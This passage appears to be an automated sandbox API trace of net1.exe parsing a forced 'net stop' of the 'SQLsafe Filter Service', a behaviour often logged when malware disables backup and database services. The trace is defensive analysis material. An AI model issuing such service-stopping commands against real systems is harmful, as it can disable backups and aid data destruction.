lpFilename=0x1df810, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0218.679] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x94) returned 0x354c00 [0218.679] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0218.680] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfa14 | out: Buffer=0x1dfa14*=0x351c98) returned 0x0 [0218.680] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfa14 | out: Buffer=0x1dfa14*=0x351cb0) returned 0x0 [0218.680] _fileno (_File=0x74eb2900) returned -2 [0218.680] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0218.680] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0218.680] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0218.680] _wcsicmp (_String1="config", _String2="stop") returned -16 [0218.680] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0218.680] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0218.680] _wcsicmp (_String1="file", _String2="stop") returned -13 [0218.680] _wcsicmp (_String1="files", _String2="stop") returned -13 [0218.680] _wcsicmp (_String1="group", _String2="stop") returned -12 [0218.680] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0218.680] _wcsicmp (_String1="help", _String2="stop") returned -11 [0218.680] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0218.680] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0218.680] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0218.680] _wcsicmp (_String1="session", _String2="stop") returned -15 [0218.680] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0218.680] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0218.680] _wcsicmp (_String1="share", _String2="stop") returned -12 [0218.680] _wcsicmp (_String1="start", _String2="stop") returned -14 [0218.680] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0218.680] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0218.680] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0218.680] _wcsicmp (_String1="accounts", _String2="ΓÇ£SQLsafe") returned -850 [0218.680] _wcsicmp (_String1="computer", _String2="ΓÇ£SQLsafe") returned -848 [0218.681] _wcsicmp (_String1="config", _String2="ΓÇ£SQLsafe") returned -848 [0218.681] _wcsicmp (_String1="continue", _String2="ΓÇ£SQLsafe") returned -848 [0218.681] _wcsicmp (_String1="cont", _String2="ΓÇ£SQLsafe") returned -848 [0218.681] _wcsicmp (_String1="file", _String2="ΓÇ£SQLsafe") returned -845 [0218.681] _wcsicmp (_String1="files", _String2="ΓÇ£SQLsafe") returned -845 [0218.681] _wcsicmp (_String1="group", _String2="ΓÇ£SQLsafe") returned -844 [0218.681] _wcsicmp (_String1="groups", _String2="ΓÇ£SQLsafe") returned -844 [0218.681] _wcsicmp (_String1="help", _String2="ΓÇ£SQLsafe") returned -843 [0218.681] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£SQLsafe") returned -843 [0218.681] _wcsicmp (_String1="localgroup", _String2="ΓÇ£SQLsafe") returned -839 [0218.681] _wcsicmp (_String1="pause", _String2="ΓÇ£SQLsafe") returned -835 [0218.681] _wcsicmp (_String1="session", _String2="ΓÇ£SQLsafe") returned -832 [0218.681] _wcsicmp (_String1="sessions", _String2="ΓÇ£SQLsafe") returned -832 [0218.681] _wcsicmp (_String1="sess", _String2="ΓÇ£SQLsafe") returned -832 [0218.681] _wcsicmp (_String1="share", _String2="ΓÇ£SQLsafe") returned -832 [0218.681] _wcsicmp (_String1="start", _String2="ΓÇ£SQLsafe") returned -832 [0218.681] _wcsicmp (_String1="stats", _String2="ΓÇ£SQLsafe") returned -832 [0218.681] _wcsicmp (_String1="statistics", _String2="ΓÇ£SQLsafe") returned -832 [0218.681] _wcsicmp (_String1="stop", _String2="ΓÇ£SQLsafe") returned -832 [0218.681] _wcsicmp (_String1="time", _String2="ΓÇ£SQLsafe") returned -831 [0218.681] _wcsicmp (_String1="user", _String2="ΓÇ£SQLsafe") returned -830 [0218.681] _wcsicmp (_String1="users", _String2="ΓÇ£SQLsafe") returned -830 [0218.681] _wcsicmp (_String1="msg", _String2="ΓÇ£SQLsafe") returned -838 [0218.681] _wcsicmp (_String1="messenger", _String2="ΓÇ£SQLsafe") returned -838 [0218.681] _wcsicmp (_String1="receiver", _String2="ΓÇ£SQLsafe") returned -833 [0218.681] _wcsicmp (_String1="rcv", _String2="ΓÇ£SQLsafe") returned -833 [0218.681] _wcsicmp (_String1="netpopup", _String2="ΓÇ£SQLsafe") returned -837 [0218.681] _wcsicmp (_String1="redirector", _String2="ΓÇ£SQLsafe") returned -833 [0218.681] _wcsicmp (_String1="redir", _String2="ΓÇ£SQLsafe") returned -833 [0218.681] _wcsicmp (_String1="rdr", _String2="ΓÇ£SQLsafe") returned -833 [0218.681] _wcsicmp (_String1="workstation", _String2="ΓÇ£SQLsafe") returned -828 [0218.681] _wcsicmp (_String1="work", _String2="ΓÇ£SQLsafe") returned -828 [0218.681] _wcsicmp (_String1="wksta", _String2="ΓÇ£SQLsafe") returned -828 [0218.681] _wcsicmp (_String1="prdr", _String2="ΓÇ£SQLsafe") returned -835 [0218.681] _wcsicmp (_String1="devrdr", _String2="ΓÇ£SQLsafe") returned -847 [0218.681] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£SQLsafe") returned -839 [0218.681] _wcsicmp (_String1="server", _String2="ΓÇ£SQLsafe") returned -832 [0218.682] _wcsicmp (_String1="svr", _String2="ΓÇ£SQLsafe") returned -832 [0218.682] _wcsicmp (_String1="srv", _String2="ΓÇ£SQLsafe") returned -832 [0218.682] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£SQLsafe") returned -839 [0218.682] _wcsicmp (_String1="alerter", _String2="ΓÇ£SQLsafe") returned -850 [0218.682] _wcsicmp (_String1="netlogon", _String2="ΓÇ£SQLsafe") returned -837 [0218.682] _wcsicmp (_String1="accounts", _String2="Filter") returned -5 [0218.682] _wcsicmp (_String1="computer", _String2="Filter") returned -3 [0218.682] _wcsicmp (_String1="config", _String2="Filter") returned -3 [0218.682] _wcsicmp (_String1="continue", _String2="Filter") returned -3 [0218.682] _wcsicmp (_String1="cont", _String2="Filter") returned -3 [0218.682] _wcsicmp (_String1="file", _String2="Filter") returned -15 [0218.682] _wcsicmp (_String1="files", _String2="Filter") returned -15 [0218.682] _wcsicmp (_String1="group", _String2="Filter") returned 1 [0218.682] _wcsicmp (_String1="groups", _String2="Filter") returned 1 [0218.682] _wcsicmp (_String1="help", _String2="Filter") returned 2 [0218.682] _wcsicmp (_String1="helpmsg", _String2="Filter") returned 2 [0218.682] _wcsicmp (_String1="localgroup", _String2="Filter") returned 6 [0218.682] _wcsicmp (_String1="pause", _String2="Filter") returned 10 [0218.682] _wcsicmp (_String1="session", _String2="Filter") returned 13 [0218.682] _wcsicmp (_String1="sessions", _String2="Filter") returned 13 [0218.682] _wcsicmp (_String1="sess", _String2="Filter") returned 13 [0218.682] _wcsicmp (_String1="share", _String2="Filter") returned 13 [0218.682] _wcsicmp (_String1="start", _String2="Filter") returned 13 [0218.682] _wcsicmp (_String1="stats", _String2="Filter") returned 13 [0218.682] _wcsicmp (_String1="statistics", _String2="Filter") returned 13 [0218.682] _wcsicmp (_String1="stop", _String2="Filter") returned 13 [0218.682] _wcsicmp (_String1="time", _String2="Filter") returned 14 [0218.682] _wcsicmp (_String1="user", _String2="Filter") returned 15 [0218.682] _wcsicmp (_String1="users", _String2="Filter") returned 15 [0218.682] _wcsicmp (_String1="msg", _String2="Filter") returned 7 [0218.682] _wcsicmp (_String1="messenger", _String2="Filter") returned 7 [0218.682] _wcsicmp (_String1="receiver", _String2="Filter") returned 12 [0218.682] _wcsicmp (_String1="rcv", _String2="Filter") returned 12 [0218.682] _wcsicmp (_String1="netpopup", _String2="Filter") returned 8 [0218.683] _wcsicmp (_String1="redirector", _String2="Filter") returned 12 [0218.683] _wcsicmp (_String1="redir", _String2="Filter") returned 12 [0218.683] _wcsicmp (_String1="rdr", _String2="Filter") returned 12 [0218.683] _wcsicmp (_String1="workstation", _String2="Filter") returned 17 [0218.683] _wcsicmp (_String1="work", _String2="Filter") returned 17 [0218.683] _wcsicmp (_String1="wksta", _String2="Filter") returned 17 [0218.683] _wcsicmp (_String1="prdr", _String2="Filter") returned 10 [0218.683] _wcsicmp (_String1="devrdr", _String2="Filter") returned -2 [0218.683] _wcsicmp (_String1="lanmanworkstation", _String2="Filter") returned 6 [0218.683] _wcsicmp (_String1="server", _String2="Filter") returned 13 [0218.683] _wcsicmp (_String1="svr", _String2="Filter") returned 13 [0218.683] _wcsicmp (_String1="srv", _String2="Filter") returned 13 [0218.683] _wcsicmp (_String1="lanmanserver", _String2="Filter") returned 6 [0218.683] _wcsicmp (_String1="alerter", _String2="Filter") returned -5 [0218.683] _wcsicmp (_String1="netlogon", _String2="Filter") returned 8 [0218.683] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0218.683] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.683] wcscpy_s (in: _Destination=0x1df514, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0218.683] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a80000 [0218.684] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x1df510, nSize=0x0, Arguments=0x1df50c | out: lpBuffer="叨5neth.dll") returned 0xff [0218.685] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0218.686] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.686] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0218.686] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0218.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0218.686] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.686] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0218.686] _wcsicmp (_String1="CONT", _String2="ΓÇ£SQLsafe") returned -848 [0218.686] _wcsicmp (_String1="CONT", _String2="Filter") returned -3 [0218.686] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0218.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.686] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0218.686] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0218.686] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.686] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0218.686] _wcsicmp (_String1="FILES", _String2="ΓÇ£SQLsafe") returned -845 [0218.686] _wcsicmp (_String1="FILES", _String2="Filter") returned -15 [0218.686] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0218.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.686] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0218.686] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.686] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0218.686] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.686] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0218.686] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£SQLsafe") returned -844 [0218.686] _wcsicmp (_String1="GROUPS", _String2="Filter") returned 1 [0218.687] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0218.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.687] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0218.687] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0218.687] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.687] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0218.687] _wcsicmp (_String1="REPL", _String2="ΓÇ£SQLsafe") returned -833 [0218.687] _wcsicmp (_String1="REPL", _String2="Filter") returned 12 [0218.687] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0218.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0218.687] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.687] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0218.687] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£SQLsafe") returned -833 [0218.687] _wcsicmp (_String1="REPLICATOR", _String2="Filter") returned 12 [0218.687] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0218.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.687] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0218.687] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0218.687] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.687] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0218.687] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£SQLsafe") returned -832 [0218.687] _wcsicmp (_String1="SESSIONS", _String2="Filter") returned 13 [0218.687] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0218.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0218.687] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.687] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0218.687] _wcsicmp (_String1="SESS", _String2="ΓÇ£SQLsafe") returned -832 [0218.687] _wcsicmp (_String1="SESS", _String2="Filter") returned 13 [0218.687] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0218.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.687] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0218.687] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.687] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0218.687] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.688] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0218.688] _wcsicmp (_String1="STATS", _String2="ΓÇ£SQLsafe") returned -832 [0218.688] _wcsicmp (_String1="STATS", _String2="Filter") returned 13 [0218.688] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0218.688] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.688] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0218.688] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.688] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0218.688] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.688] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0218.688] _wcsicmp (_String1="USERS", _String2="ΓÇ£SQLsafe") returned -830 [0218.688] _wcsicmp (_String1="USERS", _String2="Filter") returned 15 [0218.688] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0218.688] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.688] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0218.688] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.688] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0218.688] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.688] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0218.688] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£SQLsafe") returned -833 [0218.688] _wcsicmp (_String1="REDIRECTOR", _String2="Filter") returned 12 [0218.688] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0218.688] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0218.688] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.688] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0218.688] _wcsicmp (_String1="REDIR", _String2="ΓÇ£SQLsafe") returned -833 [0218.688] _wcsicmp (_String1="REDIR", _String2="Filter") returned 12 [0218.688] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0218.688] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0218.688] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.688] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0218.688] _wcsicmp (_String1="RDR", _String2="ΓÇ£SQLsafe") returned -833 [0218.688] _wcsicmp (_String1="RDR", _String2="Filter") returned 12 [0218.688] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0218.688] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0218.689] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.689] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0218.689] _wcsicmp (_String1="WORK", _String2="ΓÇ£SQLsafe") returned -828 [0218.689] _wcsicmp (_String1="WORK", _String2="Filter") returned 17 [0218.689] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0218.689] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0218.689] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.689] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0218.689] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£SQLsafe") returned -828 [0218.689] _wcsicmp (_String1="WKSTA", _String2="Filter") returned 17 [0218.689] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0218.689] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0218.689] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.689] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0218.689] _wcsicmp (_String1="PRDR", _String2="ΓÇ£SQLsafe") returned -835 [0218.689] _wcsicmp (_String1="PRDR", _String2="Filter") returned 10 [0218.689] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0218.689] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0218.689] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0218.689] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0218.689] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£SQLsafe") returned -847 [0218.689] _wcsicmp (_String1="DEVRDR", _String2="Filter") returned -2 [0218.689] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0218.689] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.689] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0218.689] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.689] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0218.689] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0218.689] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0218.689] _wcsicmp (_String1="SVR", _String2="ΓÇ£SQLsafe") returned -832 [0218.689] _wcsicmp (_String1="SVR", _String2="Filter") returned 13 [0218.689] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0218.689] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0218.689] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.689] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0218.689] _wcsicmp (_String1="SRV", _String2="ΓÇ£SQLsafe") returned -832 [0218.690] _wcsicmp (_String1="SRV", _String2="Filter") returned 13 [0218.690] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0218.690] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.690] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x1df510, nSize=0x0, Arguments=0x1df50c | out: lpBuffer="嗰5ꔺ瓡") returned 0x1c [0218.690] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0218.690] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0218.690] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0218.690] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0218.690] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0218.690] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0218.690] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0218.690] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.690] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0218.690] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0218.690] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0218.690] wcscpy_s (in: _Destination=0xeba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0218.690] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a00000 [0218.691] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a00000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xebb338, nSize=0x800, Arguments=0xeb9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0218.692] GetFileType (hFile=0x26c) returned 0x3 [0218.692] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x353c18 [0218.692] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x353c18, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0218.692] WriteFile (in: hFile=0x26c, lpBuffer=0x353c18, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1df4f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1df4f0, lpOverlapped=0x0) returned 0 [0218.692] LocalFree (hMem=0x353c18) returned 0x0 [0218.692] GetFileType (hFile=0x26c) returned 0x3 [0218.692] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x353920 [0218.692] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x353920, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n5", lpUsedDefaultChar=0x0) returned 2 [0218.692] WriteFile (in: hFile=0x26c, lpBuffer=0x353920, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1df4f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1df4f0, lpOverlapped=0x0) returned 0 [0218.692] LocalFree (hMem=0x353920) returned 0x0 [0218.692] wcscpy_s (in: _Destination=0x1df5a8, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0218.692] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0218.692] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0218.692] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0218.692] 